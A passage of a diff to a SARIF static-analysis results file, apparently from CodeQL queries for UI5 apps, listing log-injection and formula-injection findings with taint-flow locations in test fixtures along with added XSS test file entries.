- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - }, - "region" : { - "startLine" : 13, - "startColumn" : 38, - "endColumn" : 56 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "fb0b88ea7a3fc8f1:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 176 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 172 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 38 - } - }, - "message" : { - "text" : "{ type: \"int\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - }, - "region" : { - 
"startLine" : 13, - "startColumn" : 38, - "endColumn" : 56 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 176 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 153 + } }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 16, - "startColumn" : 26, - "endColumn" : 31 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "751ece7cb6fd18f7:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "req.url" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 13, - "endColumn" : 37 - } - }, - "message" : { - "text" : "url.par ... , true)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 9, - "endColumn" : 37 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 18 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 24 - } - }, - "message" : { - "text" : "q.query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "q.query.username" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - 
"startLine" : 14, - "startColumn" : 9, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 16, - "startColumn" : 26, - "endColumn" : 31 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + } }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 25, - "startColumn" : 26, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "191c273ff0751536:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "req.url" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 13, - "endColumn" : 37 - } - }, - "message" : { - "text" : "url.par ... 
, true)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 9, - "endColumn" : 37 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 18 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 24 - } - }, - "message" : { - "text" : "q.query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "q.query.username" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 9, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 18, - "endColumn" : 45 - } - }, - "message" : { - "text" : "jQuery. ... (value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 25, - "startColumn" : 26, - "endColumn" : 32 - } - }, - "message" : { - "text" : "value1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 155 + } }, { - "ruleId" : "js/ui5-log-injection", - 
"rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - }, - "region" : { - "startLine" : 17, - "startColumn" : 38, - "endColumn" : 47 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "f32b0dcd4573d6a3:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 185 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 181 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - }, - "region" : { - "startLine" : 8, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - }, - "region" : { - "startLine" : 15, - "startColumn" : 29, - "endColumn" : 47 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - }, - "region" : { - "startLine" : 15, - "startColumn" : 21, - "endColumn" : 47 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - }, - "region" : { - "startLine" : 16, - "startColumn" : 50, - "endColumn" : 55 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - }, - "region" : { - "startLine" : 16, - "startColumn" : 43, - "endColumn" : 56 - } - }, - "message" : { - "text" : "String(value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - }, - "region" : { - "startLine" : 16, - "startColumn" : 33, - "endColumn" : 57 - } - }, - "message" : { - "text" : "encodeX ... 
value))" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - }, - "region" : { - "startLine" : 16, - "startColumn" : 21, - "endColumn" : 57 - } - }, - "message" : { - "text" : "sanitized" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - }, - "region" : { - "startLine" : 17, - "startColumn" : 38, - "endColumn" : 47 - } - }, - "message" : { - "text" : "sanitized" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 185 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 156 + } }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 189 - }, - "region" : { - "startLine" : 17, - "startColumn" : 34, - "endColumn" : 39 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "392fd43c95c7be9c:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 193 - }, - "region" : { - "startLine" : 6, - "startColumn" : 5, - "endLine" : 8, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 189 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 189 - }, - "region" : { - "startLine" : 15, - "startColumn" : 25, - "endColumn" : 53 - } - }, - "message" : { - "text" : "oModel. ... 
input')" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 189 - }, - "region" : { - "startLine" : 15, - "startColumn" : 17, - "endColumn" : 53 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 189 - }, - "region" : { - "startLine" : 17, - "startColumn" : 34, - "endColumn" : 39 - } - }, - "message" : { - "text" : "input" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 193 - }, - "region" : { - "startLine" : 6, - "startColumn" : 5, - "endLine" : 8, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 157 + } }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 16, - "startColumn" : 30, - "endColumn" : 35 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "27d08bf2c216b384:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 202 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 8, - "startColumn" : 11, - "endColumn" : 22 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 14, - "startColumn" : 21, - "endColumn" : 49 - } - }, - "message" : { - "text" : "oModel. ... 
input\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 14, - "startColumn" : 13, - "endColumn" : 49 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 16, - "startColumn" : 30, - "endColumn" : 35 - } - }, - "message" : { - "text" : "input" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 202 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 158 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 159 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 160 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 161 + } }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - 
"index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 17, - "startColumn" : 34, - "endColumn" : 39 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "392fd43c95c7be9c:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 210 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 15, - "startColumn" : 25, - "endColumn" : 53 - } - }, - "message" : { - "text" : "oModel. ... 
input')" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 15, - "startColumn" : 17, - "endColumn" : 53 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 17, - "startColumn" : 34, - "endColumn" : 39 - } - }, - "message" : { - "text" : "input" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 210 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 162 + } }, { - "ruleId" : "js/ui5-formula-injection", - "rule" : { - "id" : "js/ui5-formula-injection", - "index" : 4, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The content of a saved file depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 145 - }, - "region" : { - "startLine" : 17, - "startColumn" : 27, - "endColumn" : 45 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "41899ff1a967017d:1", - "primaryLocationStartColumnFingerprint" : "10" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 150 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 146 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 145 - }, - "region" : { - "startLine" : 8, - "startColumn" : 23, - "endColumn" : 38 - } - }, - "message" : { - "text" : "{ type: \"int\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : 
